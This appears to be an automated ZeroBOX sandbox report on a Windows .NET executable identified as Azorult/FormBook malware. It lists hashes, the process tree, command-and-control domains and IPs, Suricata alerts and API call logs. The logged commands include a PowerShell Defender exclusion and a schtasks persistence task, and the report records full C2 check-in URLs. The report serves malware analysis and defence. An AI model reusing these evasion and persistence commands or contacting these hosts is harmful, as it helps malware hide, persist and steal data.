Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	July 29, 2022, 9:13 a.m.	July 29, 2022, 9:40 a.m.

Size	1.0MB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`e3f61572c6aff7954e948d5e829593b1`
SHA256	`758a693619b82e4c0188bddba10021226d25697b0bc1b397f911bcaf2a44222a`
CRC32	`DDA03BFE`
ssdeep	`24576:7w4UZvybcv8vrYImQcxddeZUK5TUxJiTH:76d8gQ4d0UK5TJTH`
Yara	IsPE32 - (no description) Win32_Trojan_PWS_Net_1_Zero - Win32 Trojan PWS .NET Azorult Is_DotNET_EXE - (no description) PE_Header_Zero - PE File Signature

vbc.exe "C:\Users\test22\AppData\Local\Temp\vbc.exe"
2392
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\lDOmXHvRQpZCRr.exe"
  2776
- schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lDOmXHvRQpZCRr" /XML "C:\Users\test22\AppData\Local\Temp\tmp46F7.tmp"
  2832
- vbc.exe "C:\Users\test22\AppData\Local\Temp\vbc.exe"
  2924

Name	Response	Post-Analysis Lookup
www.labouchedeli.com	A 45.207.118.25	45.207.118.25
www.moderze.life	A 63.141.245.131 CNAME moderze.life	63.141.245.131
www.stringerville.com	A 208.111.34.205	208.111.34.205
www.anadolusapka.online	A 93.89.226.17 CNAME anadolusapka.online	93.89.226.17
www.bdoranoilgasltd.com	CNAME bdoranoilgasltd.com A 209.205.209.34	209.205.209.34
www.lendana.net	A 104.237.50.195	104.237.50.195
www.dohsrdmoney.com	A 185.53.179.170	185.53.179.170
www.bt-vip1.com	A 104.21.46.34 A 172.67.223.34	104.21.46.34

IP Address	Status	Action
104.21.46.34	Active	Moloch
104.237.50.195	Active	Moloch
164.124.101.2	Active	Moloch
185.53.179.170	Active	Moloch
208.111.34.205	Active	Moloch
209.205.209.34	Active	Moloch
45.207.118.25	Active	Moloch
63.141.245.131	Active	Moloch
93.89.226.17	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49169 -> 209.205.209.34:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49169 -> 209.205.209.34:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49169 -> 209.205.209.34:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
UDP 192.168.56.103:53064 -> 164.124.101.2:53	2027867	ET INFO Observed DNS Query to .life TLD	Potentially Bad Traffic
TCP 192.168.56.103:49175 -> 104.21.46.34:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49175 -> 104.21.46.34:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49175 -> 104.21.46.34:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49171 -> 185.53.179.170:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49171 -> 185.53.179.170:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49171 -> 185.53.179.170:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49172 -> 63.141.245.131:80	2027876	ET INFO HTTP Request to Suspicious *.life Domain	Potentially Bad Traffic
TCP 192.168.56.103:49172 -> 63.141.245.131:80	2027876	ET INFO HTTP Request to Suspicious *.life Domain	Potentially Bad Traffic
TCP 192.168.56.103:49173 -> 93.89.226.17:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49173 -> 93.89.226.17:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49173 -> 93.89.226.17:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49174 -> 104.237.50.195:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49174 -> 104.237.50.195:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49174 -> 104.237.50.195:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49172 -> 63.141.245.131:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49172 -> 63.141.245.131:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49172 -> 63.141.245.131:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49172 -> 63.141.245.131:80	2027876	ET INFO HTTP Request to Suspicious *.life Domain	Potentially Bad Traffic
TCP 192.168.56.103:49168 -> 208.111.34.205:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49168 -> 208.111.34.205:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49168 -> 208.111.34.205:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49170 -> 45.207.118.25:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49170 -> 45.207.118.25:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49170 -> 45.207.118.25:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected

Suricata TLS

No Suricata TLS

Queries for the computername (7 events)

Time & API	Arguments	Status	Return
GetComputerNameW July 29, 2022, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 29, 2022, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 29, 2022, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 29, 2022, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA July 29, 2022, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 29, 2022, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 29, 2022, 9:39 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (3 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent July 29, 2022, 9:13 a.m.			0	0
IsDebuggerPresent July 29, 2022, 9:13 a.m.			0	0
IsDebuggerPresent July 29, 2022, 9:39 a.m.			0	0

Command line console output was observed (10 events)

Time & API	Arguments	Status	Return
WriteConsoleW July 29, 2022, 9:39 a.m.	buffer: The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function console_handle: 0x00000023	1	1
WriteConsoleW July 29, 2022, 9:39 a.m.	buffer: , script file, or operable program. Check the spelling of the name, or if a pat console_handle: 0x0000002f	1	1
WriteConsoleW July 29, 2022, 9:39 a.m.	buffer: h was included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW July 29, 2022, 9:39 a.m.	buffer: At line:1 char:17 console_handle: 0x00000047	1	1
WriteConsoleW July 29, 2022, 9:39 a.m.	buffer: + Add-MpPreference <<<< -ExclusionPath C:\Users\test22\AppData\Roaming\lDOmXHv console_handle: 0x00000053	1	1
WriteConsoleW July 29, 2022, 9:39 a.m.	buffer: RQpZCRr.exe console_handle: 0x0000005f	1	1
WriteConsoleW July 29, 2022, 9:39 a.m.	buffer: + CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co console_handle: 0x0000006b	1	1
WriteConsoleW July 29, 2022, 9:39 a.m.	buffer: mmandNotFoundException console_handle: 0x00000077	1	1
WriteConsoleW July 29, 2022, 9:39 a.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x00000083	1	1
WriteConsoleW July 29, 2022, 9:39 a.m.	buffer: SUCCESS: The scheduled task "Updates\lDOmXHvRQpZCRr" has successfully been created. console_handle: 0x00000007	1	1

Uses Windows APIs to generate a cryptographic key (46 events)

Time & API	Arguments	Status	Return
CryptExportKey July 29, 2022, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b8758 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2022, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b8d18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2022, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b8d18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2022, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b8d18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2022, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b9058 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2022, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b9058 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2022, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b9058 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2022, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b9058 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2022, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b9058 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2022, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b9058 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2022, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b8d18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2022, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b8d18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2022, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b8d18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2022, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b8818 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2022, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b8818 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2022, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b8818 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2022, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b8a98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2022, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b8818 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2022, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b8818 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2022, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b8818 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2022, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b8818 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2022, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b8818 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2022, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b8818 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2022, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b8818 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2022, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b83d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2022, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b83d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2022, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b83d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2022, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b83d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2022, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b83d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2022, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b83d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2022, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b83d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2022, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b83d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2022, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b83d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2022, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b83d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2022, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b83d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2022, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b83d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2022, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b83d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2022, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b83d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2022, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b88d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2022, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b88d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2022, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b88d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2022, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b88d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2022, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b88d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2022, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b88d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2022, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b88d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 29, 2022, 9:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b88d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx July 29, 2022, 9:13 a.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (7 events)

suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.stringerville.com/agjr/?9rz8FzAh=Gh6tluMPQTcPzyNG3zRmzh0pGICJSQ0CUkM68yXk4Zf2KgIpjM56r3gFfc5RNnk2iDOxxtSdUz6lpnbsV5fRyyCc5U2lcTVCcnegnGU=&mlvx=fZU8pTY0MT2trP
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.bdoranoilgasltd.com/agjr/?9rz8FzAh=wLgJm0zEN2ATms2/CyDHu0TfQmq0Qdx9BIX7BSDR0lyiVzgJQd6T1ThEupbW8wyYcCRWDLx3n0hYKwqwkbL/iO25XFunPFcbHS+/t1o=&mlvx=fZU8pTY0MT2trP
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.labouchedeli.com/agjr/?9rz8FzAh=Q1WOsUBcDfdQ3aMTDXwxoUuH9advFFpSbncEIUbmsSSzX/3pU7s/FUVesXbRs6YgXTF/hEXOzS3t03OE2MkP72joJzE2hGlxVlRwVNY=&mlvx=fZU8pTY0MT2trP
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.dohsrdmoney.com/agjr/?9rz8FzAh=MIHXyzReQtTKKXsL4NjRRigJE4TWaimoTOG+nOUfQu98OOW6g24o0SH/ypdTtMYzylzRxOnqTw2p75VeE5ZfvnoiMUf8y7KO2x18GDI=&mlvx=fZU8pTY0MT2trP
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.moderze.life/agjr/?9rz8FzAh=zl4Ji3koWtggKuUOv6IQWcypBjnDnWrEcGs8NoP88FgwQ4RslMBdACHlWLRkTFsphRZ0UGdbDU3dRCHToxp66exSOm+4LFPvyZcMEXM=&mlvx=fZU8pTY0MT2trP
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.lendana.net/agjr/?9rz8FzAh=RLPrgi6zXzxazkIO08wA4We7IyJr7/AqVNuUchigLl6UTdzpL7ASSLO4e8ih3pKyl7USooaVHobrnzgFxZbXcwSRjTVhavlq0x9S+4A=&mlvx=fZU8pTY0MT2trP
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.bt-vip1.com/agjr/?9rz8FzAh=cMvUU+iRx5dPYw4DF8Z3ADZbRliYC2ERcjdIPLlnxH/bLxeYplKwUpLXGSto7dGpFXcTNmqbt/tuoogMVd+yABMfw/FgUsgcEu4Nx5A=&mlvx=fZU8pTY0MT2trP

Performs some HTTP requests (7 events)

request	GET http://www.stringerville.com/agjr/?9rz8FzAh=Gh6tluMPQTcPzyNG3zRmzh0pGICJSQ0CUkM68yXk4Zf2KgIpjM56r3gFfc5RNnk2iDOxxtSdUz6lpnbsV5fRyyCc5U2lcTVCcnegnGU=&mlvx=fZU8pTY0MT2trP
request	GET http://www.bdoranoilgasltd.com/agjr/?9rz8FzAh=wLgJm0zEN2ATms2/CyDHu0TfQmq0Qdx9BIX7BSDR0lyiVzgJQd6T1ThEupbW8wyYcCRWDLx3n0hYKwqwkbL/iO25XFunPFcbHS+/t1o=&mlvx=fZU8pTY0MT2trP
request	GET http://www.labouchedeli.com/agjr/?9rz8FzAh=Q1WOsUBcDfdQ3aMTDXwxoUuH9advFFpSbncEIUbmsSSzX/3pU7s/FUVesXbRs6YgXTF/hEXOzS3t03OE2MkP72joJzE2hGlxVlRwVNY=&mlvx=fZU8pTY0MT2trP
request	GET http://www.dohsrdmoney.com/agjr/?9rz8FzAh=MIHXyzReQtTKKXsL4NjRRigJE4TWaimoTOG+nOUfQu98OOW6g24o0SH/ypdTtMYzylzRxOnqTw2p75VeE5ZfvnoiMUf8y7KO2x18GDI=&mlvx=fZU8pTY0MT2trP
request	GET http://www.moderze.life/agjr/?9rz8FzAh=zl4Ji3koWtggKuUOv6IQWcypBjnDnWrEcGs8NoP88FgwQ4RslMBdACHlWLRkTFsphRZ0UGdbDU3dRCHToxp66exSOm+4LFPvyZcMEXM=&mlvx=fZU8pTY0MT2trP
request	GET http://www.lendana.net/agjr/?9rz8FzAh=RLPrgi6zXzxazkIO08wA4We7IyJr7/AqVNuUchigLl6UTdzpL7ASSLO4e8ih3pKyl7USooaVHobrnzgFxZbXcwSRjTVhavlq0x9S+4A=&mlvx=fZU8pTY0MT2trP
request	GET http://www.bt-vip1.com/agjr/?9rz8FzAh=cMvUU+iRx5dPYw4DF8Z3ADZbRliYC2ERcjdIPLlnxH/bLxeYplKwUpLXGSto7dGpFXcTNmqbt/tuoogMVd+yABMfw/FgUsgcEu4Nx5A=&mlvx=fZU8pTY0MT2trP

Allocates read-write-execute memory (usually to unpack itself) (50 out of 191 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory July 29, 2022, 9:13 a.m.	process_identifier: 2392 region_size: 1114112 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00420000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2022, 9:13 a.m.	process_identifier: 2392 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 29, 2022, 9:13 a.m.	process_identifier: 2392 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73941000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 29, 2022, 9:13 a.m.	process_identifier: 2392 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73942000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2022, 9:13 a.m.	process_identifier: 2392 region_size: 1376256 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006e0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2022, 9:13 a.m.	process_identifier: 2392 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2022, 9:13 a.m.	process_identifier: 2392 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00462000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2022, 9:13 a.m.	process_identifier: 2392 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0047c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2022, 9:13 a.m.	process_identifier: 2392 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00750000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2022, 9:13 a.m.	process_identifier: 2392 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00751000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2022, 9:13 a.m.	process_identifier: 2392 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00752000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2022, 9:13 a.m.	process_identifier: 2392 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00495000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2022, 9:13 a.m.	process_identifier: 2392 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0049b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2022, 9:13 a.m.	process_identifier: 2392 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00497000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2022, 9:13 a.m.	process_identifier: 2392 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0046a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2022, 9:13 a.m.	process_identifier: 2392 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0046c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2022, 9:13 a.m.	process_identifier: 2392 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00753000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2022, 9:13 a.m.	process_identifier: 2392 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0048a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2022, 9:13 a.m.	process_identifier: 2392 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00487000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2022, 9:13 a.m.	process_identifier: 2392 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0047a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2022, 9:13 a.m.	process_identifier: 2392 region_size: 24576 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00754000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2022, 9:13 a.m.	process_identifier: 2392 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00486000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2022, 9:13 a.m.	process_identifier: 2392 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0075a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2022, 9:13 a.m.	process_identifier: 2392 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0075b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2022, 9:13 a.m.	process_identifier: 2392 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0075c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2022, 9:13 a.m.	process_identifier: 2392 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0075d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
